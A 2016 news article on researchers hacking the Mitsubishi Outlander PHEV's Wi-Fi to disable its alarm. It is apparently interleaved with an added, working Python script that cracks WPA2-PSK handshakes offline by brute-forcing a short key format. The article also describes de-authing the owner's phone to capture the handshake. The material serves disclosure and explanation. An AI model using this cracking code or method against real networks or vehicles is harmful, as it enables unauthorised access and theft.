Mitsubishi Outlander car alarm vulnerable to hacking


By Laura Valic
Tuesday, 07 June, 2016



It’s the stuff of every corporate giant’s nightmare — reports of product security vulnerabilities — and the latest in the spotlight is Japanese carmaker Mitsubishi with its Outlander plug-in hybrid electric vehicle (PHEV).

The vehicle’s Wi-Fi access point has been successfully hacked by security experts from Pen Test Partners, allowing them to turn off the vehicle’s alarm system and leave the car open to potential theft.

By infiltrating the Outlander’s Wi-Fi module, the security company said it could not only disengage the alarms but could also change settings and drain battery life.

Pen Test Partners said that the model has an “unusual” method of connecting the mobile app to the car. Instead of relying on a typical GSM module, the vehicle hosts its own Wi-Fi access point. To use the app’s functions, drivers have to disconnect from any other Wi-Fi network and explicitly connect to the car’s AP. However, as the company wrote in its blog, this system has not been implemented securely.

“The Wi-Fi pre-shared key is written on a piece of paper included in the owner’s manual. The format is too simple and too short,” said the team. “We cracked it on a 4 x GPU cracking rig in less than 4 days. A much faster crack could be achieved with a cloud-hosted service, or by buying more GPUs.”

Capturing the handshake, they said, was more of a challenge as the mobile device would have to be connected to the car at the time. “We realised that the car was most likely to be parked at the owner’s house, where their mobile device would also be. By de-authing the mobile from the home Wi-Fi router continuously, there was a fair chance of it then connecting to the nearby car, at which point the handshake could be captured,” wrote the company.
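The two paragraphs above describe a standard offline attack on WPA2-PSK: capture one four-way handshake (here forced by de-authing the phone so it reconnects to the car), then guess the pre-shared key offline by rederiving the key-confirmation key for each candidate and checking the handshake MIC. The Python below is an added example, not code from the article or from Pen Test Partners: it implements the 802.11i derivation (PBKDF2 for the PMK, PRF-512 for the PTK, HMAC-SHA1 for the MIC), builds a constructed handshake in the file (random nonces, a dummy EAPOL frame, an assumed SSID and an assumed four-character key of the format [abc]{4}), and cracks it. The key format, the SSID and the guess rate used in the time estimate are assumptions, not the Outlander’s real values, which the article does not give.

```python
"""Offline WPA2-PSK handshake cracking against a short pre-shared key.

Added example, not code from the article or Pen Test Partners. The handshake
is constructed here (random MACs/nonces, a dummy EAPOL frame, an assumed SSID
and key format); nothing is captured from a real vehicle.
"""
import hashlib
import hmac
import itertools
import os


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    # The 4096 iterations are the only thing slowing a guesser down; a short key
    # format removes that protection because there are simply too few keys to try.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, concatenated.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_kck(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces)).
    # The first 16 bytes are the KCK, which authenticates the EAPOL key frames.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    # WPA2/CCMP key descriptor: MIC = HMAC-SHA1(KCK, EAPOL frame with the MIC field zeroed)[:16].
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def make_handshake(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, eapol_mic_zeroed):
    """Build what a capture gives an attacker: everything except the passphrase."""
    kck = derive_kck(wpa2_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {
        "ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
        "anonce": anonce, "snonce": snonce,
        "eapol": eapol_mic_zeroed, "mic": eapol_mic(kck, eapol_mic_zeroed),
    }


def crack_handshake(hs, candidates):
    """Offline attack: rederive the KCK for each candidate and test the captured MIC.
    Nothing here talks to the access point; the capture alone is enough."""
    for cand in candidates:
        kck = derive_kck(wpa2_pmk(cand, hs["ssid"]), hs["ap_mac"], hs["sta_mac"],
                         hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return cand
    return None


def format_candidates(alphabet: str, length: int):
    """Enumerate every key of a fixed format; a short, simple format makes this tractable."""
    for tup in itertools.product(alphabet, repeat=length):
        yield "".join(tup)


def days_to_exhaust(alphabet_size: int, length: int, guesses_per_second: float) -> float:
    """Worst-case wall-clock time to try the whole keyspace at a given PBKDF2 guess rate."""
    return alphabet_size ** length / guesses_per_second / 86400


if __name__ == "__main__":
    # Constructed handshake standing in for the capture taken after de-authing the phone.
    hs = make_handshake(
        passphrase="cbba",                     # assumed short key of format [abc]{4}
        ssid="EXAMPLE-PHEV",                   # assumed SSID, not the real one
        ap_mac=bytes.fromhex("02aabbccddee"),  # constructed MACs
        sta_mac=bytes.fromhex("021122334455"),
        anonce=os.urandom(32), snonce=os.urandom(32),
        eapol_mic_zeroed=bytes.fromhex("0203005f02010a00") + b"\x00" * 87,  # dummy frame
    )
    print("recovered key:", crack_handshake(hs, format_candidates("abc", 4)))
    # Assumed aggregate rate of 1e6 PBKDF2 guesses/s for a multi-GPU rig (illustrative).
    print("days to exhaust [a-z]{8}:        %.2f" % days_to_exhaust(26, 8, 1e6))
    print("days to exhaust [A-Za-z0-9]{20}: %.3g" % days_to_exhaust(62, 20, 1e6))
```

The time estimate is the practical point: at the assumed rate an eight-character lowercase key is exhausted in a couple of days, which is the regime the researchers describe, while a long random key of the same WPA2 scheme is out of reach. The fix is therefore the key format, not the protocol; switching the PSK to a long random string would have left every other step of this attack intact but useless.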

Once connected to the access point, they were able to set up a man-in-the-middle position to monitor the data flowing between the app and the vehicle, and reported that the Wi-Fi module also gave them a route to the car’s onboard diagnostics (OBD) port.

According to cybersecurity researcher Mark Skilton, Professor at the University of Warwick in the UK, failures of poorly configured Wi-Fi security access have occurred in other high-profile cases in the past couple of years.

“These are not a failure of the system itself. All these hacks exploited poor design of the systems’ security design. In all these cases the entry point has been compromised and it allowed the hacker to gain access to other systems onboard that could include and threaten human safety,” said Professor Skilton.

“Cars are increasingly having onboard connectivity to the internet beyond just entertainment and to the operation of the car itself. But, while access to email and websites is one thing, access to mission-critical systems in any situation — be it a building, operating theatre or transport vehicle — is a whole different set of risk and security issues.”

Pen Test Partners said initial attempts to disclose the findings privately to Mitsubishi were greeted with disinterest, and that the company only engaged once the media became involved. They said the carmaker is now treating the issue as a priority and is working on a medium-term fix for consumers.

Before then, Pen Test Partners encourages all Mitsubishi Outlander PHEV owners to immediately unpair all mobile devices that have been connected to the car access point.

For information on how to do this, read their blog here.

Image courtesy of Kārlis Dambrāns under CC-BY-2.0



All content Copyright © 2024 Westwick-Farrow Pty Ltd